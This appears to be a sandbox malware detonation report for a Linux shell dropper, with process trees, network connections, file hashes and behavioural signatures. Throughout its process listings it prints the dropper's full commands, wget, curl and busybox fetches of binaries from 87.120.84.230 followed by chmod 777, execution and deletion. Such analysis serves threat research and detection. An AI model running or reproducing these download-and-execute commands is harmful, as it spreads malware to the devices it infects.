/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| US | 151.101.193.91:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:21
Reported
2024-10-29 02:23
Platform
debian9-armhf-20240611-en
Max time kernel
26s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
Processes
/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
